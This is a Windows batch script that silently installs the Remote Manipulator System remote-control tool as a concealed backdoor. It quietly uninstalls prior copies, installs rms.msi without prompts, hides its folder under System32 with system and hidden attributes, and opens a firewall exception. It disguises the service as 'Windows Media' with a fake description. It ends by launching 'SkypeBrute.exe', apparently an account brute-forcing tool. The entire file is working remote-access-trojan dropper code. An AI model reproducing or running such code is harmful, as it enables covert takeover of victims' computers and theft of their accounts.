>@echo off
@if not exist %SYSTEMROOT%\System32\sysfiles\rutserv.exe (goto inst) else (goto exit)
:inst
@taskkill /f /im rutserv.exe
@reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
@MsiExec /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /qn REBOOT=ReallySuppress
@MsiExec /x {A5DB67DC-DB0E-4491-B9F7-F258A02EE03C} /qn REBOOT=ReallySuppress
@msiexec /x {5B1EC627-A9CA-4BE8-966E-5FCB90ECD770} /qn REBOOT=ReallySuppress
@msiexec /x {54D1AB84-6B0B-445D-B7AB-E2B2FEEC3A4F} /qn REBOOT=ReallySuppress
@msiexec /x {AB7AA605-500F-4153-8207-FB5563419112} /qn REBOOT=ReallySuppress
@MsiExec /x {B04BFE4C-7F11-49D8-ADFE-867939D886FA} /qn REBOOT=ReallySuppress
@MsiExec /x {2B0A2EED-E2C8-40CE-A701-95B211A39B34} /qn REBOOT=ReallySuppress
@ping 127.0.0.1
@MsiExec /I "rms.msi" /qn
@attrib +s +h "%SYSTEMROOT%\System32\sysfiles"
@ping 127.0.0.1
@sc config "RManService" start= auto displayname= "Windows Media"
@sc description "RManService" "Authorization and authentication for signed Windows Media files"
@goto end
:exit
@"%SYSTEMROOT%\System32\sysfiles\rutserv.exe" /silentinstall
@"%SYSTEMROOT%\System32\sysfiles\rutserv.exe" /firewall
@"%SYSTEMROOT%\System32\sysfiles\rutserv.exe" /start
@ping 127.0.0.1
@sc config "RManService" start= auto displayname= "Windows Media"
@sc description "RManService" "Authorization and authentication for signed Windows Media files"
start rms.msi
start SkypeBrute.exe
:end